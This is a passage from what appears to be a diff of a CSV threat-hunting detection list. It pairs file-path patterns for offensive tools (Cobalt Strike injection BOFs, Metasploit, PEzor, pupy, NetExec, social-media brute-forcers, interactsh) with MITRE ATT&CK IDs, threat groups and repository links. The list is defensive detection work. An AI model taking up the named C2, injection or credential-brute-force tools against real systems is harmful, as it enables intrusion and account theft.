T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/dde/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/Injection.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/kernelcallbacktable*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntcreatethread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntcreatethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntqueueapcthread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/setthreadcontext*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/svcctrl/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/tooltip/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/uxsubclassinfo*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injections/SQL.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/injectsu.exp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" 
+"*/injectsu.lib*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" 
+"*/injectsu.pdb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" 
+"*/injectsu/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/inline_syscall.git*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
 "*/inline_syscall/include/in_memory_init.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 
- T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" 
-"*/inline-exec/*.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" 
+"*/inline-exec/*.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
 "*/InlineWhispers*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z"
 "*/insta-bf.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential 
Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z"
 "*/instabf.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" 
-"*/instabrute.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" 
+"*/instabrute.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z"
 "*/instainsane.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z"
 "*/instainsane.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" 
-"*/install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" 
+"*/install_elevated.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" 
+"*/install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is 
a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z"
 "*/insTof.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" 
-"*/interactive_shell.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" 
-"*/interactsh/*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" 
-"*/interactsh-client*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" 
-"*/interactsh-collaborator*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" 
-"*/interactsh-server*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
